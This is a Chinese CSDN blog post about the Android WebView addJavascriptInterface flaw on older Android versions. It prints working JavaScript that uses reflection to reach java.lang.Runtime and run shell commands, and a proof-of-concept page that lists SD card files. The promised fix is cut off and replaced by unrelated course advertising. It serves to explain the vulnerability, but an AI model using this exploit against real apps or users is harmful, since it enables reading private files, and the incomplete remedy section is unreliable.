Android WebView的Js对象注入漏洞解决方案,看完没有不懂的

最新推荐文章于 2024-05-16 03:26:39 发布
最新推荐文章于 2024-05-16 03:26:39 发布
阅读量329 收藏 9
点赞数 4
分类专栏: 程序员 文章标签: android javascript 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84091289/article/details/137310983
版权
文章讨论了在AndroidWebView中使用addJavascriptInterface可能导致的安全风险,JavaScript可通过恶意代码访问设备SD卡和敏感信息。作者详细解释了攻击原理,并提供了漏洞实例和针对Android4.2以上版本的解决方案。
摘要由CSDN通过智能技术生成

  • This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level [JELLY_BEAN]( ) or below, because JavaScript could use reflection to access an injected object’s public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

  • JavaScript interacts with Java object on a private, background thread of this WebView. Care is therefore required to maintain thread safety.

  • The Java object’s fields are not accessible.

简单地说,就是用addJavascriptInterface可能导致不安全,因为JS可能包含恶意代码。今天我们要说的这个漏洞就是这个,当JS包含恶意代码时,它可以干任何事情。

2,漏洞描述

通过JavaScript,可以访问当前设备的SD卡上面的任何东西,甚至是联系人信息,短信等。这很恶心吧,嘎嘎。好,我们一起来看看是怎么出现这样的错误的。可以去看看乌云平台上的这个bug描述: 猛点这里

1,WebView添加了JavaScript对象,并且当前应用具有读写SDCard的权限,也就是:android.permission.WRITE_EXTERNAL_STORAGE

2,JS中可以遍历window对象,找到存在“getClass”方法的对象的对象,然后再通过反射的机制,得到Runtime对象,然后调用静态方法来执行一些命令,比如访问文件的命令.

3,再从执行命令后返回的输入流中得到字符串,就可以得到文件名的信息了。然后想干什么就干什么,好危险。核心JS代码如下:

[javascript] view plain copy

print ?

  1. function execute(cmdArgs)

  2. {

  3. for (var obj in window) {

  4. if (“getClass” in window[obj]) {

  5. alert(obj);

  6. return  window[obj].getClass().forName(“java.lang.Runtime”)

  7. .getMethod(”getRuntime”,null).invoke(null,null).exec(cmdArgs);

  8. }

  9. }

  10. }

function execute(cmdArgs)

{

for (var obj in window) {

if (“getClass” in window[obj]) {

alert(obj);

return  window[obj].getClass().forName(“java.lang.Runtime”)

.getMethod(“getRuntime”,null).invoke(null,null).exec(cmdArgs);

}

}

}

3,漏洞证明

**举例一:**为了证明这个漏洞,写了一个demo来说明。我就只是加载一个包含恶意JS代码的本地网页,HTML其代码如下:

[html] view plain copy

print ?

  1. <html>

  2. <head>

  3. <meta http-equiv=“Content-Type” content=“text/html; charset=UTF-8”>

  4. <script>

  5. var i=0;

  6. function getContents(inputStream)

  7. {

  8. var contents = “”+i;

  9. var b = inputStream.read();

  10. var i = 1;

  11. while(b != -1) {

  12. var bString = String.fromCharCode(b);

  13. contents += bString;

  14. contents += ”\n”

  15. b = inputStream.read();

  16. }

  17. i=i+1;

  18. return contents;

  19. }

  20. function execute(cmdArgs)

  21. {

  22. for (var obj in window) {

  23. console.log(obj);

  24. if (“getClass” in window[obj]) {

  25. alert(obj);

  26. return window[obj].getClass().forName(“java.lang.Runtime”).

  27. getMethod(“getRuntime”,null).invoke(null,null).exec(cmdArgs);

  28. }

  29. }

  30. }

  31. var p = execute([“ls”,”/mnt/sdcard/”]);

  32. document.write(getContents(p.getInputStream()));

  33. </script>

  34. <script language=“javascript”>

  35. function onButtonClick()

  36. {

  37. // Call the method of injected object from Android source.

  38. var text = jsInterface.onButtonClick(“从JS中传递过来的文本!!!”);

  39. alert(text);

  40. }

  41. function onImageClick()

  42. {

  43. //Call the method of injected object from Android source.

  44. var src = document.getElementById(“image”).src;

  45. var width = document.getElementById(“image”).width;

  46. var height = document.getElementById(“image”).height;

  47. // Call the method of injected object from Android source.

  48. jsInterface.onImageClick(src, width, height);

  49. }

  50. </script>

  51. </head>

  52. <body>

  53. <p>点击图片把URL传到Java代码</p>

  54. <img class=“curved_box” id=“image”

  55. οnclick=“onImageClick()”

  56. width=“328”

  57. height=“185”

  58. src=“http://t1.baidu.com/it/u=824022904,2596326488&fm=21&gp=0.jpg”

  59. οnerrοr=“this.src=’background_chl.jpg’”/>

  60. </p>

  61. <button type=“button” οnclick=“onButtonClick()”>与Java代码交互</button>

  62. </body>

  63. </html>

点击图片把URL传到Java代码

<img class=“curved_box” id=“image”

οnclick=“onImageClick()”

width=“328”

height=“185”

src=“http://t1.baidu.com/it/u=824022904,2596326488&fm=21&gp=0.jpg”

οnerrοr=“this.src=‘background_chl.jpg’”/>

<button type=“button” οnclick=“onButtonClick()”>与Java代码交互

这段HTML的运行效果如下:

图一:期望运行结果图

上图中,点击 按钮后,JS中传递 一段文本到Java代码,显示一下个toast,点击 图片后,把图片的URL,width,height传到Java层,也用toast显示出来。

要实现这样的功能,就需要注Java对象。

简单说明一下

1,请看 **execute()**这个方法,它遍历所有window的对象,然后找到包含getClass方法的对象,利用这个对象的类,找到java.lang.Runtime对象,然后调用“getRuntime”静态方法方法得到Runtime的实例,再调用exec()方法来执行某段命令。

2,getContents()方法,从流中读取内容,显示在界面上。

3,关键的代码就是以下两句

[javascript] view plain copy

print ?

  1. return window[obj].getClass().forName(“java.lang.Runtime”).

  2. getMethod(”getRuntime”,null).invoke(null,null).exec(cmdArgs);

return window[obj].getClass().forName(“java.lang.Runtime”).

getMethod(“getRuntime”,null).invoke(null,null).exec(cmdArgs);

Java代码实现如下:

[java] view plain copy

print ?

  1. mWebView = (WebView) findViewById(R.id.webview);

  2. mWebView.getSettings().setJavaScriptEnabled(true);

  3. mWebView.addJavascriptInterface(new JSInterface(), “jsInterface”);

  4. mWebView.loadUrl(”file:///android_asset/html/test.html”);

mWebView = (WebView) findViewById(R.id.webview);

mWebView.getSettings().setJavaScriptEnabled(true);

mWebView.addJavascriptInterface(new JSInterface(), “jsInterface”);

mWebView.loadUrl(“file:///android_asset/html/test.html”);

需要添加的权限:

[html] view plain copy

print ?

  1. <uses-permission android:name=“android.permission.INTERNET”/>

  2. <uses-permission android:name=“android.permission.ACCESS_NETWORK_STATE” />

  3. <uses-permission android:name=“android.permission.WRITE_EXTERNAL_STORAGE” />

当点击LOAD菜单后,运行截图如下:(理论上应该出现图一界面)

图二:实际运行结果,列出了SDCard中的文件

**举例二:**360浏览器也存在这个问题,我测试的系统是android 4.0.2,360浏览器版本是:4.8.7

在浏览器输入框中输入:http://bitkiller.duapp.com/jsobj.html,然后前往,它会出现如下的界面

图三:360浏览器运行结果

说明:其中searchBoxJavaBridge_不是360注入的对象,而是WebView内部注入的,这是在3.0以后的Android系统上添加的。

在关闭这个对话框之后,它会列出当前SDCard上面的所有文件列表,如下图所示

图四:错误结果

4,解决方案

1,Android 4.2以上的系统

在Android 4.2以上的,google作了修正,通过在Java的远程方法上面声明一个@JavascriptInterface,如下面代码:

[java] view plain copy

print ?

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数前端工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Web前端开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

如果你觉得这些内容对你有帮助,可以扫码获取!!(备注:前端)

最后

给大家分享一些关于HTML的面试题,有需要的朋友可以戳这里免费领取,先到先得哦。


理了一份《2024年Web前端开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。**

[外链图片转存中…(img-cK5iiytH-1712083130167)]

[外链图片转存中…(img-UisJyCBH-1712083130167)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!

[外链图片转存中…(img-HAhvZKZ7-1712083130167)]

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

如果你觉得这些内容对你有帮助,可以扫码获取!!(备注:前端)

最后

给大家分享一些关于HTML的面试题,有需要的朋友可以戳这里免费领取,先到先得哦。

[外链图片转存中…(img-oeZISLn5-1712083130168)]
[外链图片转存中…(img-dclKtYJ4-1712083130168)]

2401_84091289
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DoKit:一机多控WebView无侵入注入JS|滴滴开源
DiDi_Tech的博客
06-28 2524
将滴滴技术设为“星标⭐️”第一时间收到文章更新导读自2018年正式对外开源以来,DoKit经历了五年的打磨,已经发展成一个相对整的生态,支持六大平台(Android、iOS、Web、小程序、Flutter和PC),是滴滴开源委员会的精品孵化项目。在外部被众多头部企业广泛使用并获得了良好的口碑。在滴滴内部,DoKit已经在所有业务线和App中落地使用,基本覆盖所有日常开发和测试场景,提升了研发和质...
WebView注入JavaScript代码
Noodles_ck的博客
10-23 867
应用需要统计网页打开情况,部分三方网页在网页跳转时无法在onPageFinished中监测到。使用代码注入在网页url发生变化时调用原生代码,传入新的url。
2024年安卓最新android webView注入js方法,android插件化原理面试
最新发布
2401_84564150的博客
05-16 820
今天关于面试的分享就到这里,还是那句话,有些东西你不仅要,而且要能够很好地表达出来,能够让面试官认可你的理解,例如Handler机制,这个是面试必问之题。有些晦涩的点,或许它只活在面试当中,实际工作当中你压根不会用到它,但是你要知道它是什么东西。最后在这里小编分享一份自己收录整理上述技术体系图相关的几十套腾讯、头条、阿里、美团等公司2021年的面试题,把技术点整理成了视频和PDF(实际上比预期多花了不少精力),包含知识脉络 + 诸多细节,由于篇幅有限,这里以图片的形式给大家展示一部分。还有。
Android WebView注入CSS+JS的项目解决方案
Leo-软件开发
07-04 7060
在某个项目中,由于用到第三方的接口,登录和授权的界面也由第三方提供,而我们是在车机产品上使用,分辨率为800X480。第三方并有针对这个分辨率的布局,并且不为我们进行修改,就算是高德去推也有推动。因此,只能使用偏门的方法,之所以说偏门,是因为注入css和js的方式是有风险的,假如web端改了页面,可能我们的app就得跟着升级了。好了,下面开始正题首先,要在WebView注入JS,我们需要开启J...
Androidwebview填坑系列——向webview注入本地js文件
yyanjun的博客
05-17 2万+
需求:    在使用webview加载H5界面时,注入一个本地js文件(该js文件的作用是采集H5页面中用户的点击事件)。也就是在webview打开了一个H5页面的时候动态的注入一个js,让该js和页面并行执行各自的逻辑。思路:    查阅了一下网上的资料,思路也就两种,这里先列出来,后面再对这两种思路做评判,如下所示:(1)第一种思路:将本地的js文件读出来已字符串的形式,通过webview.l...
AndroidWebView无法后退和js注入漏洞解决方案
09-02
对于JavaScript注入漏洞,尤其是在Android 4.2及以下版本,WebView的安全性较低,恶意代码可能通过注入JS来操控应用。为了防止这种情况,开发者应启用WebView的安全设置,例如禁用JavaScript执行,或者使用`WebView....
android webview input=file 失效解决方案
05-24
1. **安全策略限制**:AndroidWebView遵循Chrome的同源策略,不允许跨域访问,包括本地文件系统。出于安全考虑,`input=file`选择文件的API被禁用或限制。 2. **文件选择器缺失**:在一些Android版本中,点击`...
Android webview注入JS代码 修改网页内容操作
08-19
"Android webview注入JS代码 修改网页内容操作" Android webview注入JS代码 修改网页内容操作是Android开发中的一种常见操作,主要用于修改网页的内容以达到特定的效果。下面是关于Android webview注入JS代码 修改...
android webview 图片上传 4.4解决方案js注入webview
04-08
Android Webview upload 图片上传 ! 导读: ...扩充 webview 防止js注入 解决 android webview 在4.4系统上无法使用情况 博客地址 : http://blog.csdn.net/aaawqqq/article/details/51087805
AndroidWebView常见问题及解决方案汇总
01-20
Android WebView常见问题解决方案汇总: 就目前而言,如何应对版本的频繁更新呢,又如何灵活多变地展示我们的界面呢,这又涉及到了web app与native app之间孰优孰劣的争论. 于是乎,一种混合型的app诞生了,灵活多变的...
androidjs注入和方法统一管理,android WebView 注入js 几种方式
weixin_29504987的博客
05-26 1185
有时我们开发中需要将js 注入到我们本地,有可能你会说,放在Web不就可以了吗,的确,但是需求就是这样的通过流的形式注入@SuppressLint("ObsoleteSdkInt")public void onJsLocal() {StringBuilder builder = new StringBuilder(getJS(this, "qqq.js"));if (Build.VERSION.S...
Webview js注入问题
piaoershi的博客
11-28 2392
鄙人嫖二十,菜鸡一个,多多指教。 平常我们如果想把自己写的js文件或者一段代码加进H5里,直接利用下面这代码就好了。 if (Build.VERSION.SDK_INT <= Build.VERSION_CODES.KITKAT) { mWebView.loadUrl("javascript:你想加入的代码或者文件(字符串类型)"); } else { mWebView.evaluateJavascript(“你想加入的代码或者文件(字符
android webview 动态注入,Android WebView注入js监听
weixin_35878962的博客
05-25 962
前言在android端,使用webview播放视频需要全屏。但是webview一些坑非常多,所以用js注入的方式手动全屏。解决方案1.设置webview支持JavaScriptwebSettings.setJavaScriptEnabled(true);2.写监听事件(该事件当然是js写法,找个js工具我这里用的WebStorm,工具什么的不重要,重要的是写正确,我这里因为有ID所以直接取ID注册...
androidjs注入原理,彻底解决andorid h5交互!浅谈h5交互和js注入漏洞分析
weixin_42502255的博客
05-27 871
文章分两块,js调用andorid代码,android代码调用js前提 打开js交互 webview.getSetting().setJavaScriptEnable(true);一:android调用js代码说明:主要有两种方式,方式1: 4.4系统以前//需要另外开启线程mWebView.post(new Runnable() {// @Overridep...
webviewjs动态注入
追梦赤子心
04-07 8206
使用场景 加载在线网页,需要在网页加载成之后,通过js注入的方式,对其中的部分元素进行属性的修改.这里的示例是使用本地的网页进行修改。在线的使用同样的方式处理.### html源代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title&gt...
android js注入,webview注入js文件实现js调用本地方法
weixin_39637700的博客
05-29 690
webview注入js文件实现js调用本地方法1.创建一个内部类对象,其中通过@JavascriptInterface来声明android本地方法供js调用;class JSObject {@JavascriptInterfacepublic void closeWindow() {//do something...}@JavascriptInterfacepublic void openIma...
androidjs注入和方法统一管理,Android、iOS的webview注入JavaScript代码修改网页内容...
weixin_39728544的博客
05-26 653
Android、iOS的webview注入JavaScript代码修改网页内容需要修改webview中的网页内容、网页元素动作1.实现原理webview导航栏方法中执行JavaScript代码浏览器地址栏是支持运行JavaScript代码的javascript:开头后跟要执行的语句// 弹窗javascript:alert('hello world!');ps:不可以复制粘贴的方式来测试,这样是无...
Android WebViewJs对象注入漏洞解决方案
热门推荐
永远即等待的专栏
09-30 8万+
Android webview注入JS对象引发的安全漏洞,恶意的JS脚本可以读取到SDcard上面的任何文件,本文给出了这种漏洞的一种解决方案
WebView加载html并且注入js代码调用Java方法
眼里有光 未来可期
05-25 584
在项目中经常有像新闻详情页或者活动详情页,这些页面一般都是接口返回HTML字符串,我们直接用webview加载出来即可。但是这个详情页需要添加一个点赞按钮并且点击按钮调用本地Java代码,应该怎么做呢? webview实现与js交互 mWebView.addJavascriptInterface(this, "injectedObject"); html加载本地drawable资源图片<img style=\"width:15;height:15;\" src=\"file:///androi
android webview js注入
06-07
Android WebView 中,可以通过使用 `WebView.loadUrl("javascript: your_js_code_here")` 方法注入 JavaScript 代码。这样,可以在 WebView 中执行 JavaScript 代码,实现一些交互效果。 另外,也可以使用 `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值